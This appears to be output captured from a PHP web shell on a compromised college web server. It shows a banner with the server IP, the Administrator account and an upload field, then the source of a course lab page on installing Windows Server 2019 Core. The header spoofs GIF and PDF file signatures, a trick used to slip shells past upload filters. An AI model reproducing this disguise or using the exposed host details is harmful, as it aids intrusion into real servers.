GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2274/Labs/Lab02/ |
Upload File : |
<? // JimMartinson/CST2274/Labs/Lab02/Lab02.phpinc require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // ReplacedNaN require('JimMartinson/CST2274/Labs/GenerateComputerNames.phpinc'); // Includes 'Gradebook/EvaluationSubmission_BEGIN.phpinc'. $uploadFilename = $saveFilename.'_Core.png'; $disabled = ''; //$disabled = ' disabled'; if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> <fieldset><legend>Description</legend> Install a Windows 2019 Server Core then install and uninstall the GUI. </fieldset> <fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend> <?=$gradeNote?> <ol class="count"> <li> Create a directory called <b class="copyText"><?=$evaluationName?></b>. We will use it for all work performed in this lab. </li> <li>Create a VM for installation of Windows 2019 Server.</li> <li>Install Windows 2019 Server Standard core only.</li> <li>Change the cmd window font to something larger (I used Lucida Console size 20).</li> <li>Re-name your server <b class="copyText"><?=$coreServerName?></b> (remember to re-boot after changing the server name).</li> <li>Show OS information. <ol> <li>Enter the following two commands: <ol> <li><cmd class="copyText">hostname</cmd></li> <li><cmd class="copyText">systeminfo | find "OS"</cmd></li> </ol> </li> <li>Take a screenshot and save it as <b class="copyText"><?=$uploadFilename?></b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/systeminfo.png" width="995" height="523" alt="Core OS information example screenshot"/><br> <? showEnd (); ?> </li> </ol> </li> <li>Turn in your assignment: <ol type="a"> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li> </ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </li> <? /**/ ?> </ol> <?=$gradeNote?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>